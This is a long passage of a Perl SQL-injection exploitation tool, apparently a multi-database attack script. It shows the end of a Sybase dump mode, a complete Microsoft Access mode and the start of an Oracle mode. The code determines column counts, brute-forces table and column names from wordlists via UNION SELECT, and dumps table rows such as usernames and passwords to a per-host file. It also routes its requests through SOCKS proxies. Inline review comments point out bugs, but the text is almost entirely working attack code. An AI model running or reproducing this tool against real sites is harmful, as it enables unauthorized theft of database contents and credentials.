  6844.              }
  6845.              if ($s_method == 0) {
  6846.                if ($s == 0) {
  6847.                     $current = $ss_sql_start . $s_sql_pref1 .  'max(' . $column_name . ')' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . $db_name . ".." . $table_name . $s_filtr;
  6848.                } else {
  6849.                     $current = $ss_sql_start . $s_sql_pref1 .  'max(' . $column_name . ')' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . $db_name . ".." . $table_name . $s_plus . "where" . $s_plus . "convert(varchar," . $f_column . ")" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $current_name . ")" . $s_filtr;
  6850.                }
  6851.              }
  6852.                $content = scan_url();
  6853.                if ($content =~ m/ussr(.*?)ussr/imgs) {
       # One column: the whole captured value is the exclusion key.
  6854.                    if ($size == 1) {
  6855.                           if ($s == 0) {
  6856.                               $temp = $1;
       # Numeric heuristic: if int() round-trips to the same length the value
       # is placed in the NOT IN list as-is, otherwise hex-encoded via
       # ascii_to_hex() (defined elsewhere). Values such as "007" fail the
       # length test and are therefore hex-encoded.
  6857.                               $temp1 = int($temp);
  6858.                               if (length($temp) == length($temp1)) {
  6859.                                     $current_name = $1;
  6860.                               } else {
  6861.                                     $current_name = ascii_to_hex($1);
  6862.                               }
  6863.                           } else {
  6864.                               $temp = $1;
  6865.                               $temp1 = int($temp);
  6866.                               if (length($temp) == length($temp1)) {
  6867.                                     $current_name .= "," . $1;
  6868.                               } else {
  6869.                                     $current_name .= "," . ascii_to_hex($1);
  6870.                               }
  6871.                           $temp = "";
  6872.                           $temp1 = "";
  6873.                           }
       # Several columns: only the first field (before ':') is the key.
  6874.                    } else {
  6875.                         ($temp2) = split(/:/,$1);
  6876.                         if ($s == 0) {
  6877.                              $temp = $temp2;
  6878.                              $temp1 = int($temp);
  6879.                              if (length($temp) == length($temp1)) {
  6880.                                   $current_name = $temp2;
  6881.                              } else {
  6882.                                   $current_name = ascii_to_hex($temp2);
  6883.                              }
  6884.                         } else {
  6885.                              $temp = $temp2;
  6886.                              $temp1 = int($temp);
  6887.                              if (length($temp) == length($temp1)) {
  6888.                                   $current_name .= "," . $temp2;
  6889.                              } else {
  6890.                                   $current_name .= "," . ascii_to_hex($temp2);
  6891.                              }
  6892.                              $temp = "";
  6893.                              $temp1 = "";
  6894.                              $temp2 = "";
  6895.                         }
  6896.                    }
       # NOTE(review): $1 is printed after the split(/:/) in the multi-column
       # branch and after calls to ascii_to_hex(); this relies on neither
       # resetting the capture — confirm, otherwise the printed row is empty.
  6897.                    print "   " . $1 . "\n";
  6898.                    print FILE "  "  . $1 . "\n";
  6899.                } else {
  6900.                   $flag = 1;
  6901.                }
  6902.                $s++;
  6903.                print $s . "\r";
  6904.                sleep $pause;
  6905.  
  6906.             }
  6907.      print "----------\n";
  6908.      print "Saved in " . "z_" . $host . ".txt\n";
  6909.      close(FILE);
  6910.      goto START_sb;
  6911. } #end Sybase
  6912.  
  6913. if ($choice == 6) {goto START_global} # back to the main menu; label is defined outside this view
  6914. }
  6915. #################################################################################################################
  6916. ## Access ##
  6917. if ($choice == 5) {
  6918. START_a:
       # Access mode entry: derive the host from $a_source_sql, do the optional
       # HTTPS form login once, pick a SOCKS proxy once, then show the menu.
       # Every mode below ends with "goto START_a", so this run re-executes
       # after each mode; the *_check flags keep the one-off steps from repeating.
       # $host10 is only assigned when the URL is https://...; otherwise it keeps
       # whatever value it had before (presumably set outside this view).
  6919. if ($a_source_sql =~ m/^https:\/\/?([^\/]+)/i) {
  6920.    $host10 = $1;
  6921.    $https_flag = 1;
  6922.    print "----------------------\n";
  6923.    print "HTTPS mode enabled\n";
  6924.    print "----------------------\n";
  6925. }
  6926. $host = $host10;
       # One-off login: POSTs the configured credentials ($https_auth_*, set at
       # the top of the file) and keeps the returned cookie in the shared $ck1.
       # req() and collect() are defined elsewhere.
  6927. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  6928.     print "-----------------------------------------\n";
  6929.     print "Authorization required, wait please....";
  6930.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  6931.     $ck1 = collect($answ1);
  6932.     $https_auth_check = 1;
  6933.     print " DONE\n";
  6934.     print "-----------------------------------------\n";
  6935. }
       # One-off SOCKS selection; socks_check() (elsewhere) presumably reads the
       # package global $query built here.
  6936. if ($use_socks == 1 && $socks_check == 0) {
  6937.   $check_url = $host;
       # NOTE(review): the Host header interpolates $check_host, which is not
       # assigned in this block ($check_url is) — confirm it is set elsewhere,
       # otherwise the probe goes out with an empty Host header.
  6938.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  6939.            . "Host: $check_host\r\n"
  6940.            . "Referer: http://" . $check_url . "\r\n"
  6941.            . "Accept: */*\r\n"
  6942.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  6943.            . "Connection: close\r\n\r\n";
  6944.    print "----------------------------------------\n";
  6945.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  6946.    print "Timeout = 5 sec:\n";
  6947.    print "----------------------------------------\n";
  6948.    $socks_check = 0;
  6949.    $check_socks = socks_check();
  6950.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  6951.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  6952.   if ($current_proxy_host) {
  6953.      $socks_check = 1;
  6954.      print "Will use --> $proxy_message\n";
  6955.   } else {
       # Message says "Exit" but execution continues without a proxy, and the
       # block is re-entered on the next START_a pass because $socks_check stays 0.
  6956.      $socks_check = 0;
  6957.      $proxy_message = "No";
  6958.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  6959.   }
  6960. }
  6961. print "----------------------------------------------------------\n";
  6962. print "               Choose mode:\n";
  6963. print "----------------------------------------------------------\n";
  6964. print "    [1] Access Sql inj brute column number\n";
  6965. print "    [2] Access Sql inj brute tables\n";
  6966. print "    [3] Access Sql inj brute columns\n";
  6967. print "    [4] Access Sql inj get data from columns\n";
  6968. print "----------------------------------------------------------\n";
  6969. print "    [5]  Main menu\n";
  6970. print "----------------------------------------------------------\n";
       # Menu selection; compared numerically by the if-chain that follows.
  6971. $choice = <STDIN>;
  6972. chomp $choice;
  6973. print "Your choice - $choice\n";
  6974. if ($choice == 1) {
       # Access mode 1: find the column count by sending "order by N" for
       # N = 1..$a_max_column_number in parallel and taking the smallest N whose
       # response contains $a_error_code_column_more; the count is N-1.
       # NOTE(review): 2-arg open, return value unchecked; $host is spliced
       # into the mode/filename string.
  6975.      open( FILE1, ">>" . "z_" .$host . ".txt" ); # append-mode results file
  6976.      print FILE1 "   Number of columns:\n";
  6977.      print FILE1 "   -------------\n";
  6978.      print "-----------------------------------------\n";
  6979.      print "Access brute column number\n";
  6980.      print "URL - " . $a_source_sql . $a_plus . "order" . $a_plus . "by" . "..." . $a_filtr .  "\n";
  6981.      print "Error message = [" .$a_error_code_column_more."]\n";
  6982.      print "Max columns = [" .$a_max_column_number."]\n";
  6983.      print "-----------------------------------------\n";
  6984.      print "Request method - $method\n";
  6985.      print "Threads - 10\n";
  6986.      print "Proxy - $proxy_message\n";
  6987.      print "-----------------------------------------\n";
       # %aa is cleared but never used; $aa (scalar) holds the returned hashref.
  6988.      %aa = ();
  6989.      $aa = a_column_number();
  6990.      $data1 = "";
       # Comma operator plus statement-modifier "for": assigns each value in key
       # order, so $data1 ends as the value of the highest key (or "" if empty).
  6991.      $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
       # Then take the minimum value over the hash.
  6992.      while ( my ($key, $value) = each(%$aa) ) {
  6993.         if ($data1 > $value) {$data1 = $value}
  6994.      }
       # Empty result: "" - 1 == -1, reported below as "Can't find".
  6995.      $column_num = $data1 - 1;
       # Builds the probe list, runs 11 workers (0..$thr) and merges their
       # {index => N} results. Named sub inside an if-block: compiled once at
       # file load, so it is callable regardless of control flow.
       # NOTE(review): @columns_brute_url / @columns_brute_n are never reset;
       # re-running this mode via START_a appends a second copy of every URL.
  6996.      sub a_column_number {
  6997.                     $i = 1;
  6998.                     while($i <= $a_max_column_number) {
  6999.                        $url = $a_source_sql . $a_plus . "order" . $a_plus . "by" . $a_plus . $i . $a_filtr;
  7000.                        push(@columns_brute_url, $url);
  7001.                        push(@columns_brute_n, $i);
  7002.                        $i++;
  7003.                    }
  7004.                    $size = @columns_brute_n;
  7005.                    $thr = 10;
  7006.                    $num = -1;
  7007.                    %res5 = ();
  7008.                    $i = 0;
  7009.                    for(0..$thr) {
  7010.                       $trl[$_] = threads->create(\&gets1010);
  7011.                    }
       # Each join returns a hashref; an empty %res5 from a worker that found
       # nothing merges harmlessly.
  7012.                    for(0..$thr) {
  7013.                       %res5 = (%res5, %{$trl[$_]->join});
  7014.                    }
       # Worker: claim the next index under lock, probe it through
       # a_column_check() (elsewhere; reads $a_current/$current_error), and
       # return {index => N} on the first hit. Unlike gets680 the claimed index
       # is bounds-checked, but it is still re-read from $num without the lock.
  7015.                    sub gets1010 {
  7016.                           $| = 1;
  7017.                           $data5 = 0;
  7018.                           $ii = 0;
  7019.                           while ($num < $size) {
  7020.                             { lock($num);
  7021.                             $num++; }
  7022.                             $ii = $num;
  7023.                             if ($ii < $size) {
  7024.                                 $a_current = $columns_brute_url[$num];
  7025.                                 $nom = $columns_brute_n[$num];
  7026.                                 $current_error = $a_error_code_column_more;
  7027.                                 $data5 = a_column_check();
  7028.                                 if ($data5 == 1) {
  7029.                                   $hash5{$ii} = $nom;
  7030.                                   return \%hash5;
  7031.                                 }
  7032.                             }
  7033.                             print $num . "\r";
  7034.                             sleep $pause;
  7035.                           }
  7036.                   }
  7037.                   return \%res5;
  7038.      }
  7039.      if ($column_num == -1) {
  7040.         print "Can't find number of columns\n";
  7041.      } else {
  7042.         print "Find column number - $column_num\n";
       # Template "union select 1,2,...,N from" printed for later modes.
  7043.         $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
  7044.         $i = 1;
  7045.         while ($i <= $column_num) {
  7046.           if ($i == 1) {
  7047.                     $union .= 1;
  7048.           } else {
  7049.                    $union .= "," . $i;
  7050.           }
  7051.           $i++;
  7052.         }
  7053.         $a_current_url = $union . $a_plus . "from" . $a_plus;
  7054.         print $union . $a_plus . "from" . $a_plus . "[table]" . $a_filtr ."\n";
  7055.         print FILE1 $union . $a_plus . "from" . $a_plus . "[table]" . $a_filtr ."\n";
  7056.      }
  7057.      print "----------\n";
  7058.      print "Saved in " . "z_" . $host . ".txt\n";
  7059.      close(FILE1);
  7060.      goto START_a;
  7061. }
  7062. if ($choice == 2) {
       # Access mode 2: try each table name from the wordlist $source_table_list
       # (optionally prefixed) in a "union select ... from <name>" request and
       # report the names whose response does not look like $a_error_code_table.
       # NOTE(review): 2-arg open, return value unchecked; see mode 1.
  7063.    open( FILE1, ">>" . "z_" .$host . ".txt" ); # append-mode results file
  7064.        print "   Brute tables\n";
  7065.        print "   -------------\n";
  7066.        print FILE1 "   Brute tables\n";
  7067.        print FILE1 "   -------------\n";
  7068.        print "   Enter number of columns:\n";
       # Column count is not validated; a non-numeric answer yields 0 columns.
  7069.        $choice1 = <STDIN>;
  7070.        chomp $choice1;
  7071.        $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
  7072.        $i = 1;
  7073.        while ($i <= $choice1) {
  7074.           if ($i == 1) {
  7075.                     $union .= 1;
  7076.           } else {
  7077.                    $union .= "," . $i;
  7078.           }
  7079.           $i++;
  7080.        }
  7081.        $a_current_url = $union . $a_plus . "from" . $a_plus;
  7082.        print $a_current_url . "[brute table]" . $a_filtr . "\n";
  7083.        print "   --------------------------------------------------------------------------\n";
       # Wordlist read: unchecked open; only lines without a space are kept
       # (the split yields an empty second field). Note ($a,$b) are the sort()
       # globals — harmless here but clobbered.
       # NOTE(review): @tables4 is never cleared, so re-entering this mode via
       # START_a appends the wordlist again and $size doubles.
  7084.        open(FILE, "<", $source_table_list);
  7085.        $c = " ";
  7086.        while(<FILE>) {
  7087.          chomp;
  7088.          ($a,$b)= split(/$c/,$_);
  7089.          if (!$b) {push(@tables4, $_)}
  7090.        }
  7091.        close(FILE);
  7092.        print "Add prefix for brute tables ? ( for example - tbl_ ) (1/0): ";
  7093.        $choice = <STDIN>;
  7094.        chomp $choice;
  7095.        if ($choice == 1) {
  7096.               print "Enter your prefix for brute tables: ";
  7097.               $choice = <STDIN>;
  7098.               chomp $choice;
  7099.               $pref_brute = $choice;
  7100.        } else {
  7101.               $pref_brute = "";
  7102.        }
  7103.        $size = @tables4;
  7104.        print "File: $source_table_list\n";
  7105.        print "Tables: $size\n";
  7106.        print "-------------\n";
  7107.        print "Request method - $method\n";
  7108.        print "Threads - $kol_threads\n";
  7109.        print "Proxy - $proxy_message\n";
  7110.        print "----------------------\n";
  7111.        $thr = $kol_threads; # worker count; the loops below spawn $thr + 1 threads
  7112.        $num = -1;           # shared index, pre-incremented by each worker
  7113.        for(0..$thr) {
  7114.             $trl[$_] = threads->create(\&gets731);
  7115.        }
  7116.        for(0..$thr) {
  7117.             $trl[$_]->join;
  7118.        }
       # Worker: same claim-then-probe shape as gets680, with the same caveats:
       # $num is re-read without the lock after the increment, the guard runs
       # before the increment so $num can reach $size, and FILE1 is written
       # from all threads without serialisation. a_table_check() is defined
       # elsewhere and reads $a_current / $current_error.
  7119.        sub gets731 {
  7120.             $| = 1;
  7121.             while ($num<$size) {
  7122.                { lock($num);
  7123.                $num++; }
  7124.                $current1 = $pref_brute . $tables4[$num];
  7125.                $a_current = $a_current_url . $current1 . $a_filtr;
  7126.                $current_error = $a_error_code_table;
  7127.                $content = a_table_check();
  7128.                if ($content == 1) {
  7129.                     print "   ---> " . $current1 . "\n";
  7130.                     print FILE1 "  "  . $current1 . "\n";
  7131.                }
  7132.                print $num . "\r";
  7133.                sleep $pause;
  7134.  
  7135.             }
  7136.        }
  7137.        print "----------\n";
  7138.        print "Saved in " . "z_" . $host . ".txt\n";
  7139.        close(FILE1);
  7140.        goto START_a;
  7141.  
  7142. }
if ($choice == 3) {
       # Access mode, menu item 3: dictionary brute-force of column names in one table.
       # Every candidate is tried as a UNION SELECT over $table_name and judged by
       # a_table_check() (defined elsewhere) against $a_error_code_column.
       # All state below is package-global; FILE1 is the per-host results log.
       open( FILE1, ">>" . "z_" .$host . ".txt" ); # append-mode results log; 2-arg open with no error check, so a failed open is silent
       print "   Brute columns\n";
       print "   -------------\n";
       print "   Enter number of columns:\n";
       $choice1 = <STDIN>;
       chomp $choice1;
       print FILE1 "   -------------\n";
       print "   Enter table_name:\n";
       $choice2 = <STDIN>;
       chomp $choice2;
       $table_name = $choice2;
       # Step 1: build a UNION SELECT with StrConv(i,1) in every position; the
       # response that echoes ^i^ tells which column is rendered by the page.
       $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
       $i = 1;
       while ($i <= $choice1) {
          if ($i == 1) {
                    $union .= $a_sql_pref1 . "StrConv(" . $i . ",1)" . $a_sql_pref2;
          } else {
                   $union .= "," . $a_sql_pref1 . "StrConv(" . $i . ",1)" . $a_sql_pref2;
          }
          $i++;
       }

       $a_current_url = $union . $a_plus . "from" . $a_plus;
       $current = $a_current_url . $table_name . $a_filtr;
       print "Find out printable column, wait please...\n";
       print "------------------------------------------\n";
       $content = scan_url();
       $print_column = 0;
       # Linear probe for the first ^i^ marker; setting $i = $choice1 is the
       # author's way of breaking out of the C-style loop (a `last` would do).
       for ($i = 1; $i <= $choice1; $i++) {
           if ($content =~ m/\^$i\^/img) {
                  $print_column = $i;
                  print "Printable column - " . $i . "\n";
                  print FILE1 "Printable column - " . $i . "\n";
                  $i = $choice1;
            }
       }
       if ($print_column == 0) {
         print "Can't find printable column...";
         goto START_a;   # NOTE: FILE1 is left open on this path (closed only at the end of the block)
       }
       # Step 2: rebuild the UNION with a literal "^" placeholder in the printable
       # slot; split()ing on it below yields the left/right halves of the payload.
       $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
       $i = 1;
       $flag = 0;   # assigned but not read anywhere in this block
       while ($i <= $choice1) {
          if ($i == 1) {
                    $union .= 1;
          } else {
                   if ($i == $print_column) {
                        if ($i == 1) {   # unreachable: the outer else already implies $i != 1
                             $union .= "^";
                        } else {
                             $union .= ",^";
                        }
                   } else {
                        $union .= "," . $i;
                   }
          }
          $i++;
       }
       ($union_left,$union_right) = split(/\^/,$union);
       print $union_left . "[brute column]" . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr . "\n";
       print "   --------------------------------------------------------------------------\n";
       print FILE1 "   Brute columns from $table_name\n";
       print FILE1 $union_left . "[brute column]" . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr . "\n";
       print FILE1 "   -------------\n";
       # Load the wordlist: one candidate per line; lines containing a space are
       # skipped. @columns4 is appended to, never reset, so re-entering this menu
       # item in the same run accumulates duplicates. open() is unchecked.
       open(FILE, "<", $source_column_list);
       $c = " ";
       while(<FILE>) {
         chomp;
         ($a,$b)= split(/$c/,$_);
         if (!$b) {push(@columns4, $_)}
       }
       close(FILE);
       print "Add prefix for brute columns ? ( for example - tbl_ ) (1/0): ";
       $choice = <STDIN>;
       chomp $choice;
       if ($choice == 1) {
              print "Enter your prefix for brute columns: ";
              $choice = <STDIN>;
              chomp $choice;
              $pref_brute = $choice;
       } else {
              $pref_brute = "";
       }
       $size = @columns4;
       print "File: $source_column_list\n";
       print "Columns: $size\n";
       print "-------------\n";
       print "Request method - $method\n";
       print "Threads - $kol_threads\n";
       print "Proxy - $proxy_message\n";
       print "----------------------\n";
       $thr = $kol_threads; # number of worker threads (the 0..$thr loops below actually start $thr+1)
       $num = -1; # shared work counter (file-level `my $num : shared`); pre-incremented by each worker
       for(0..$thr) {
            $trl[$_] = threads->create(\&gets732);
       }
       for(0..$thr) {
            $trl[$_]->join;
       }
       # Worker: claim the next wordlist index under lock, send one probe, log hits.
       # The `$num<$size` test runs outside the lock, so several workers can pass it
       # together and the final increments may index past the end of @columns4.
       # Writes to FILE1 from multiple threads are not serialised.
       sub gets732 {
            $| = 1;
            while ($num<$size) {
               { lock($num);
               $num++; }
               $current1 = $pref_brute . $columns4[$num];
               $a_current = $union_left . $current1 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
               $current_error = $a_error_code_column;
               $content = a_table_check();   # returns 1 on a hit (its implementation is outside this block)
               if ($content == 1) {
                    print "   ---> " . $current1 . "\n";
                    print FILE1 "  "  . $current1 . "\n";
               }
               print $num . "\r";
               sleep $pause;   # inter-request delay; one burst of $thr+1 requests per $pause seconds is the traffic shape a defender would see

            }
       }
       print "----------\n";
       print "Saved in " . "z_" . $host . ".txt\n";
       close(FILE1);
       goto START_a;   # back to the Access mode menu (label defined earlier in the file)

}
if ($choice == 4) {
    # Access mode, menu item 4: dump rows from chosen columns of one table.
    # Rows are fetched one at a time with "top 1 ... where <first column> not in (<already seen>)",
    # i.e. the request size grows with every row retrieved. All state is package-global.
    open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log; 2-arg open, unchecked
    # Encode a string as chr(n)%2bchr(n)... (URL-encoded "+" between calls).
    # Perl compiles this named sub once regardless of the enclosing `if`.
    # Uses package globals ($str1, $aa, $bb, $i) rather than `my`, so calling it
    # clobbers the caller's $i. The `($)` prototype forces scalar context on the
    # argument; it does not validate it.
    sub achar($) {
         $str1=$_[0];
         $aa="";$bb="";
         for ($i = 0; $i<length($str1); $i++ ) {
             $aa =  ord(substr($str1,$i,1));
             if ( $i == 0 ) {$bb= "chr(" . $aa . ")";} else { $bb= $bb. "%2bchr(" . $aa . ")" ;}
         }
         return "$bb";
    }
    print "   Enter number of columns:\n";
       $choice1 = <STDIN>;
       chomp $choice1;
       print FILE1 "   -------------\n";   # NOTE: this branch opened FILE, not FILE1; with FILE1 closed this print is silently lost
       print "   Enter table_name:\n";
       $choice2 = <STDIN>;
       chomp $choice2;
       $table_name = $choice2;
       # Same printable-column discovery as menu item 3 (StrConv(i,1) per slot, look for ^i^).
       $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus;
       $i = 1;
       while ($i <= $choice1) {
          if ($i == 1) {
                    $union .= $a_sql_pref1 . "StrConv(" . $i . ",1)" . $a_sql_pref2;
          } else {
                   $union .= "," . $a_sql_pref1 . "StrConv(" . $i . ",1)" . $a_sql_pref2;
          }
          $i++;
       }

       $a_current_url = $union . $a_plus . "from" . $a_plus;
       $current = $a_current_url . $table_name . $a_filtr;
       print "Find out printable column, wait please...\n";
       print "------------------------------------------\n";
       $content = scan_url();
       $print_column = 0;
       for ($i = 1; $i <= $choice1; $i++) {
           if ($content =~ m/\^$i\^/img) {
                  $print_column = $i;
                  print "Printable column - " . $i . "\n";
                  print FILE1 "Printable column - " . $i . "\n";   # same FILE/FILE1 mismatch as above
                  $i = $choice1;   # loop exit by overwriting the index
            }
       }
       if ($print_column == 0) {
         print "Can't find printable column...";
         close(FILE);
         goto START_a;
       }
       # Rebuild with "top 1" and a "^" placeholder in the printable slot.
       $union =  $a_source_sql . $a_plus . "union" . $a_plus . "select" . $a_plus . "top" . $a_plus . "1" . $a_plus;
       $i = 1;
       $flag = 0;
       while ($i <= $choice1) {
          if ($i == 1) {
                    $union .= 1;
          } else {
                   if ($i == $print_column) {
                        if ($i == 1) {   # unreachable inside the else branch
                             $union .= "^";
                        } else {
                             $union .= ",^";
                        }
                   } else {
                        $union .= "," . $i;
                   }
          }
          $i++;
       }
    ($union_left,$union_right) = split(/\^/,$union);
    print $union_left . "[data]" . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr . "\n";
    print "   --------------------------------------------------------------------------\n";
    print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
    $choice = <STDIN>;
    print "Detect column(s) type, wait please....";
    chomp $choice;
    $column_name1 = $choice;
    @column_spis = split(/,/,$column_name1);
    $size = @column_spis;
    # Column type detection relies on the application echoing the Access error
    # text "Data type mismatch"; a site that suppresses database errors defeats
    # this step. Non-text columns get wrapped in StrConv(col,1).
    if ($size == 1) {
          $f_column = $column_name1;
          $current = $union_left .  $a_sql_pref1 . $column_name1 . $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
          $content = scan_url();
          if ($content =~ m/Data type mismatch/imgs) {
             $column_name = "StrConv(" . $column_name1 . ",1)";
          } else {
             $column_name = $column_name1;
          }
    }
    if ($size > 1) {
       # Several columns are concatenated with chr(58) (":") so one row comes back as a single field.
       $column_name = "";
       $f_column = $column_spis[0];
       $a = 0;
       while ($a < $size) {
        if ($a == ($size-1)) {
          $current = $union_left . $a_sql_pref1 . $column_spis[$a] .  $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
          $content = scan_url();
          if ($content =~ m/Data type mismatch/imgs) {
             $column_name .= "StrConv(" . $column_spis[$a] . ",1)";
          } else {
             $column_name .= $column_spis[$a];
          }
        } else {
          $current = $union_left .  $a_sql_pref1 . $column_spis[$a] . $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
          $content = scan_url();
          if ($content =~ m/Data type mismatch/imgs) {
             $column_name .= "StrConv(" . $column_spis[$a] . ",1)%2Bchr(58)%2B";;
          } else {
             $column_name .= $column_spis[$a] . "%2Bchr(58)%2B";
          }
        }
        $a++;
       }
    }
    print "DONE\n";
    print FILE  "-----------------------------------------\n";
    print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " . $table_name . " ]\n";
    print FILE  "-----------------------------------------\n";
    print "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
    print "-----------------------------------------\n";
    ## Count rows in the table (count(*) wrapped in chr(94) = "^" markers) ##
    print "Count data from [ $table_name  ]\n";
    $current = $union_left . "chr(94)%2bStrConv(count(*),1)%2bchr(94)" . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
    $content = scan_url();
    $column_name_p1 = $content;
    $column_name_p1 =~ m/\^(.*)\^/imgs;
    $column_name_p = $1;   # if the match above failed, $1 still holds the previous successful capture
    print "$column_name_p\n";
    print "----------\n";
    print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
    $choice = <STDIN>;
    chomp $choice;
    $thr = $kol_threads; # number of worker threads (not used by this branch, which is single-threaded)
    if ($choice == 1) {
          $num = 0; # start position
    } else {
          print "Enter START_position: ";
          $choice1 = <STDIN>;
          chomp $choice1;
          $num = $choice1-1;
          print "Enter END_position: ";
          $choice2 = <STDIN>;
          chomp $choice2;
          $column_name_p = $choice2-1;
          print "Dump records from [" . ($num+1) . "] to [" . ($column_name_p+1) . "]\n";
    }
    print "-----------------------------------------\n";
    print "Request method - $method\n";
    print "Threads - $kol_threads\n";
    print "Proxy - $proxy_message\n";
    print "----------------------\n";
    ## Fetch rows one by one until a response carries no ^...^ marker. ##
    ## The START/END positions read above are not consulted by this loop;
    ## `$i = $num` is assigned and never read.
            $| = 1;
            $current_name = "";   # comma-separated list of first-column values already seen (NOT IN (...))
            $s = 0;               # rows fetched so far
            $flag = 0;            # set to 1 when a response has no marker
            $temp = "";
            $temp1 = "";
            $temp2 = "";
            while ($flag == 0) {
               $i = $num;
               if ($s == 0) {
                    $current = $union_left . $a_sql_pref1 . $column_name . $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_filtr;
               } else {
                    $current = $union_left . $a_sql_pref1 . $column_name  . $a_sql_pref2 . $union_right . $a_plus . "from" . $a_plus . $table_name . $a_plus . "where" . $a_plus . $f_column . $a_plus . "not" . $a_plus . "in" . $a_plus . "(" . $current_name . ")" .  $a_filtr;
               }
               $content = scan_url();
               if ($content =~ m/\^(.*)\^/imgs) {
                   # length($x) == length(int($x)) is the author's "looks numeric" test:
                   # numeric keys go into the NOT IN list verbatim, anything else via achar().
                   if ($size == 1) {
                          if ($s == 0) {
                              $temp = $1;
                              $temp1 = int($temp);
                              if (length($temp) == length($temp1)) {
                                    $current_name = $1;
                              } else {
                                    $current_name = achar($1);
                              }
                          } else {
                              $temp = $1;
                              $temp1 = int($temp);
                              if (length($temp) == length($temp1)) {
                                    $current_name .= "," . $1;
                              } else {
                                    $current_name .= "," . achar($1);
                              }
                          $temp = "";
                          $temp1 = "";
                          }
                   } else {
                        # multi-column rows come back as "v1:v2:..."; only the first value keys the NOT IN list
                        ($temp2) = split(/:/,$1);
                        if ($s == 0) {
                             $temp = $temp2;
                             $temp1 = int($temp);
                             if (length($temp) == length($temp1)) {
                                  $current_name = $temp2;
                             } else {
                                  $current_name = achar($temp2);
                             }
                        } else {
                             $temp = $temp2;
                             $temp1 = int($temp);
                             if (length($temp) == length($temp1)) {
                                  $current_name .= "," . $temp2;
                             } else {
                                  $current_name .= "," . achar($temp2);
                             }
                             $temp = "";
                             $temp1 = "";
                             $temp2 = "";
                        }
                   }
                   print "   " . $1 . "\n";
                   print FILE "  "  . $1 . "\n";
               } else {
                  $flag = 1;
               }
               $s++;
               print $s . "\r";
               sleep $pause;

            }
    #}
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE);
    goto goto START_a;   # `goto goto LABEL` is a computed goto whose operand jumps first; reads like a typo for `goto START_a`

}
if ($choice == 5) {goto START_global}   # Access mode menu item 5: return to the top-level menu (label defined earlier in the file)
  7496. }
  7497. ####################################################################################################################
  7498. ## Oracle sql inj ##
if ($choice == 6) {
# Oracle mode. START_o is re-entered by `goto` after each sub-menu action, so
# everything from here to the menu prompt runs again on every loop.
START_o:
# $host11 is only assigned when the configured URL is https://; for an http://
# target it is presumably set by an earlier parse that is not visible here — TODO confirm.
if ($o_source_sql =~ m/^https:\/\/?([^\/]+)/i) {
   $host11 = $1;
   $https_flag = 1;
   print "----------------------\n";
   print "HTTPS mode enabled\n";
   print "----------------------\n";
}
$host = $host11;
# One-time login over HTTPS (settings $https_mode_auth / $https_auth_script_path /
# $https_auth_post_data come from the global config block at the top of the file).
# req() and collect() are defined elsewhere; the session cookie lands in the
# shared $ck1.
if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
    print "-----------------------------------------\n";
    print "Authorization required, wait please....";
    my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
    $ck1 = collect($answ1);
    $https_auth_check = 1;
    print " DONE\n";
    print "-----------------------------------------\n";
}
# SOCKS selection: probe entries of $socks_file once per run with the request in $query.
# $check_host is not assigned in this block — it looks like a leftover from another
# mode; if it is unset the Host header is empty. TODO confirm.
if ($use_socks == 1 && $socks_check == 0) {
  $check_url = $host;
  our $query = "GET / HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: http://" . $check_url . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
           . "Connection: close\r\n\r\n";
   print "----------------------------------------\n";
   print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
   print "Timeout = 5 sec:\n";
   print "----------------------------------------\n";
   $socks_check = 0;
   $check_socks = socks_check();   # returns "host:port:type" or an empty value (defined elsewhere)
  ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  if ($current_proxy_host) {
     $socks_check = 1;
     print "Will use --> $proxy_message\n";
  } else {
     $socks_check = 0;
     $proxy_message = "No";
     print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";   # despite the message, execution continues without a proxy
